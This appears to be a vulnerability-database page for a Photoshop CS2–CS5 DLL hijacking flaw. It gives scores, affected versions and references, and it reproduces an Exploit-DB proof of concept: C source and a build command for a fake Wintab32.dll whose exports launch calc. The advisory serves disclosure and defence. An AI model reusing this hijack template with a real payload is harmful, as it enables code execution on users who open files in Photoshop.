Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Untrusted search path vulnerability in Adobe PhotoShop CS2 through CS5 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll or Wintab32.dll that is located in the same folder as a PSD or other file that is processed by PhotoShop. NOTE: some of these details are obtained from third party information.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 14741
Publication date : 2010-08-24 22h00 +00:00
Author : storm
EDB Verified : No
/*
Exploit Title: Adobe Photoshop CS2 DLL Hijacking Exploit (Wintab32.dll)
Date: August 25, 2010
Author: storm ([email protected])
Version: CS2 (9.0) - Other versions are very possibly exploitable too
Tested on: Windows Vista SP2
http://www.gonullyourself.org/
gcc -shared -o Wintab32.dll Photoshop-DLL.c
As far as I can tell, every file extension esoteric to Photoshop (documents, plug-ins, brushes, etc.) is affected, but image files (.png, .jpg, .bmp) are not affected. Strangely enough, other file types such as .php and .c with Photoshop (only ones I tested) _are_ affected.
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
DllExport void CloseTabletDevice() { hax(); }
DllExport void CreateTaskBarIcon() { hax(); }
DllExport void GetFunctionKeysEx() { hax(); }
DllExport int __stdcall RunTaskBarIconEx(void) { hax(); return 0xdefaced; }
DllExport void OpenTabletDevice() { hax(); }
DllExport void RegDeleteFKeys() { hax(); }
DllExport void RegGetFKeys() { hax(); }
DllExport void RemoveTaskBarIcon() { hax(); }
DllExport void RunClientSideService() { hax(); }
DllExport void RunTaskBarIcon() { hax(); }
DllExport void SetFunctionKeys() { hax(); }
DllExport void SetFunctionKeysEx() { hax(); }
DllExport void TDCalibration() { hax(); }
DllExport void TDGetHwInfoEx() { hax(); }
DllExport void TDGetHwInfoExV2() { hax(); }
DllExport void TDGetInfoEx() { hax(); }
DllExport void TDGetProtectData() { hax(); }
DllExport void TDSetInfoEx() { hax(); }
DllExport void TGL_Attach() { hax(); }
DllExport void TGL_Close() { hax(); }
DllExport void TGL_Detach() { hax(); }
DllExport void TGL_EndLine() { hax(); }
DllExport void TGL_Get() { hax(); }
DllExport void TGL_LineTo() { hax(); }
DllExport void TGL_MoveTo() { hax(); }
DllExport void TGL_Open() { hax(); }
DllExport void TGL_Set() { hax(); }
DllExport void UpdateTaskBar() { hax(); }
DllExport void WTClose() { hax(); }
DllExport void WTConfig() { hax(); }
DllExport void WTDataGet() { hax(); }
DllExport void WTDataPeek() { hax(); }
DllExport void WTEnable() { hax(); }
DllExport void WTExtGet() { hax(); }
DllExport void WTExtSet() { hax(); }
DllExport void WTGetA() { hax(); }
DllExport void WTGetActiveSessionID() { hax(); }
DllExport void WTGetW() { hax(); }
DllExport void WTInfoA() { hax(); }
DllExport void WTInfoW() { hax(); }
DllExport void WTMgrClose() { hax(); }
DllExport void WTMgrConfigReplaceExA() { hax(); }
DllExport void WTMgrContextEnum() { hax(); }
DllExport void WTMgrContextOwner() { hax(); }
DllExport void WTMgrCsrButtonMap() { hax(); }
DllExport void WTMgrCsrEnable() { hax(); }
DllExport void WTMgrCsrExt() { hax(); }
DllExport void WTMgrCsrPressureBtnMarks() { hax(); }
DllExport void WTMgrCsrPressureBtnMarksEx() { hax(); }
DllExport void WTMgrCsrPressureResponse() { hax(); }
DllExport void WTMgrDefContext() { hax(); }
DllExport void WTMgrDeviceConfig() { hax(); }
DllExport void WTMgrExt() { hax(); }
DllExport void WTMgrOpen() { hax(); }
DllExport void WTMgrPacketHookExA() { hax(); }
DllExport void WTMgrPacketHookNext() { hax(); }
DllExport void WTMgrPacketUnhook() { hax(); }
DllExport void WTOnEvent() { hax(); }
DllExport void WTOpenA() { hax(); }
DllExport void WTOpenW() { hax(); }
DllExport void WTOverlap() { hax(); }
DllExport void WTPacket() { hax(); }
DllExport void WTPacketsGet() { hax(); }
DllExport void WTPacketsPeek() { hax(); }
DllExport void WTQueuePacketsEx() { hax(); }
DllExport void WTQueueSizeGet() { hax(); }
DllExport void WTQueueSizeSet() { hax(); }
DllExport void WTRestore() { hax(); }
DllExport void WTSave() { hax(); }
DllExport void WTServiceStart() { hax(); }
DllExport void WTServiceStop() { hax(); }
DllExport void WTSetA() { hax(); }
DllExport void WTSetActiveSessionID() { hax(); }
DllExport void WTSetDevice() { hax(); }
DllExport void WTSetW() { hax(); }
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
Products Mentioned
Configuraton 0
Adobe>>Photoshop >> Version 9.0
- Adobe>>Photoshop >> Version 9.0 (Open CPE detail)
Adobe>>Photoshop >> Version 9.0.1
- Adobe>>Photoshop >> Version 9.0.1 (Open CPE detail)
Adobe>>Photoshop >> Version 9.0.2
- Adobe>>Photoshop >> Version 9.0.2 (Open CPE detail)
Adobe>>Photoshop >> Version 10.0
- Adobe>>Photoshop >> Version 10.0 (Open CPE detail)
Adobe>>Photoshop >> Version 11.0
- Adobe>>Photoshop >> Version 11.0 (Open CPE detail)
- Adobe>>Photoshop >> Version 11.0 (Open CPE detail)
Adobe>>Photoshop >> Version 12.0
References
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6778
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
2025©
tesweb SA
